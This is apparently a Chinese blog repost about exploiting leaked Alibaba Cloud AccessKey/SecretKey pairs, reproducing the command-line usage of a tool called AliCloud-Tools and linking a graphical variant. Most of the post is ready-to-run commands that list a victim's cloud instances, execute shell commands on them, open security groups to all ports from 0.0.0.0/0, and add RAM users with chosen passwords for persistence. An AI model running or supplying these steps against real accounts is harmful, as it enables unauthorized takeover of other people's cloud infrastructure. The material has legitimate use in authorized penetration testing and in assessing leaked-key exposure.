首页 > 其他分享 >云主机AK/SK泄露利用

云主机AK/SK泄露利用

时间:2023-04-27 12:55:20浏览次数:34  
标签:string -- 主机 AK SK ecs action Tools AliCloud

https://github.com/iiiusky/alicloud-tools

AK/SK利用

行云管家直接大部分主流的云厂商。

https://yun.cloudbility.com/

 

使用方式

该工具主要是方便快速使用阿里云api执行一些操作

Usage:
  AliCloud-Tools [flags]
  AliCloud-Tools [command]

Available Commands:
  ecs         ECS 操作(查询/执行命令),当前命令支持地域ID设置.
  help        Help about any command
  ram         RAM账号增删查操作
  sg          安全组操作,当前命令支持地域ID设置.
  version     

Flags:
  -a, --ak string      阿里云 AccessKey
  -h, --help           help for AliCloud-Tools
      --regions        显示所有地域信息
  -r, --rid string     阿里云 地域ID,在其他支持rid的子命令中,如果设置了地域ID,则只显示指定区域的信息,否则为全部.
      --sak string     阿里云 STS AccessKey
  -s, --sk string      阿里云 SecretKey
      --ssk string     阿里云 STS SecretKey
      --sts            启用STSToken模式
      --token string   阿里云 STS Session Token
  -v, --verbose        显示详细的执行过程


查看所有地域信息

./AliCloud-Tools -a <AccessKey> -s <SecretKey> --regions


查看所有实例信息

./AliCloud-Tools -a <AccessKey> -s <SecretKey> ecs --list


 

 

查看所有正在运行的实例信息

./AliCloud-Tools -a <AccessKey> -s <SecretKey> ecs --list --runner



 

查看指定实例的信息

./AliCloud-Tools -a <AccessKey> -s <SecretKey> [-r <regionId>] ecs --sid <InstanceId>

指定AK/SK 获取主机列表

./AliCloud-Tools -a xxx -s xxx ecs –list


执行命令

./AliCloud-Tools -a <AccessKey> -s <SecretKey> [-r <regionId>] ecs exec -I <InstanceId[,InstanceId,InstanceId,...]> -c "touch /tmp/123123aaaa.txt"

指定AK/SK,实例ID,和执行的命令。

./AliCloud-Tools -a xxx -s xxx ecs exec -I xxx -c “whoami”  

 

查看安全组策略

./AliCloud-Tools -a <AccessKey> -s <SecretKey> -r <regionId> sg --sid <SecruityGroupId>

 




增加安全组策略

./AliCloud-Tools -a <AccessKey> -s <SecretKey> -r <regionId> --sid <SecruityGroupId> --action add --protocol tcp --port 0/0 --ip 0.0.0.0/0




删除安全组策略

./AliCloud-Tools -a <AccessKey> -s <SecretKey> -r <regionId> --sid <SecruityGroupId> --action del --protocol tcp --port 0/0 --ip 0.0.0.0/0


增加RAM用户

./AliCloud-Tools -a <AccessKey> -s <SecretKey> ram --action add --username test2 --password 1q2w@WW3
   

查看RAM用户

./AliCloud-Tools -a <AccessKey> -s <SecretKey> ram --action list

删除RAM用户

./AliCloud-Tools -a <AccessKey> -s <SecretKey> ram --action del --username test2



图形化工具

https://github.com/mrknow001/aliyun-accesskey-Tools/releases/tag/1.0

 

 



 

标签:string,--,主机,AK,SK,ecs,action,Tools,AliCloud
From: https://www.cnblogs.com/websec80/p/17358616.html

相关文章

  • 连接metamask,并签名
    在assets下新建metamask.jsimport{ethers}from"ethers";//版本号为"ethers":"^4.0.47",import{buildLoginNonce}from'@/api/register'//请求接口后台返回随机验证码/****@param{*}ethereum连接钱包类型metamask(ethereum)、nabox(Nab......
  • 七天学会flask(六)---模板-行语句(3)(第一天)
    flask模板技术---行语句flask行语句,可以让模板的代码编写更加容易便捷,不然总是用{%...%}来标识挺麻烦的,使用行语句首先需要进行设置app.jinja_env.line_statement_prefix='#'先来看一下不使用行语句时如何写一段for循环{%foriinrange(10)%}<p>{{i}}</p>......
  • pandas numpy where mask 关系总结
    ......
  • 七天学会flask(六)---模板-转义(3)(第一天)
    flask模板技术---转义Jinja自动根据模板语法进行html渲染,但某些时候,我们不希望它进行渲染,原因在于一旦渲染,其结果并不是我们所期望的,比如下面这段html<!DOCTYPEhtml><htmllang="en"><head><metacharset="UTF-8"><title>Title</title></head><b......
  • 两天学会flask(六)---模板-上下文环境(3)(20分钟)
    flask模板---上下文环境在前面的示例中,想要在模板里显示数据,只能通过在render_template函数里传参数来解决。但对于flask的上下文变量和自定义上下文变量,则不必如此,你可以直接在模板里使用他们。1.request请求对象request,携带了大量有关请求的信息,比如请求的path,url,参数,你可以......
  • gitleaks 保护以及发现安全key的工具
    gitleaks可以方便的扫描git项目,发现潜在的key泄漏问题,可以方便的集成到我们的ci/cd中说明对于需要发现代码中安全key的问题,gitleaks是一个值得使用的工具参考资料https://github.com/gitleaks/gitleakshttps://gitleaks.io/......
  • How do I make a delicious lemon cheesecake?
    Therearemanydifferentwaystoprepareadeliciouslemoncheesecake.Hereisonepopularrecipethatyoucantry:Ingredients:21/4cupsgrahamcrackercrumbs(about150crackers)3tablespoonssugar8ozcreamcheese,softened1cupgranulatedsugar1......
  • cmake包含单独.hpp文件
    myproject/├──CMakeLists.txt├──main.cpp└──include└──hello.hpp#OpenCVfind_package(OpenCVREQUIRED)include_directories(${OpenCV_INCLUDE_DIRS})#Eigenfind_package(Eigen3REQUIRED)include_directories(${EIGEN3_INCLUDE_DIR})include_dire......
  • [ABC213E] Stronger Takahashi
    2023-01-17题目传送门翻译难度&重要性(1~10):4题目来源AtCoder题目算法bfs解题思路首先,这道题的问题是从家到鱼市摧毁障碍物的最少次数。我们很容易想到用广搜的方法来做。因为\(2\leH,W\le500\),数据很小,理论上我们可以对于每个障碍物都进行一次爆破。虽然爆破的范......
  • java线程之FutureTask
    FutureTask是线程的异步计算。如果有多个线程,每个线程都要花很多时间计算,而且所花时间不同,最后要统计,就要用到此类。此类有个done方法,等call完后,执行此方法。代码:packagecom.concurrent;importjava.util.ArrayList;importjava.util.List;importjava.util.Random;importja......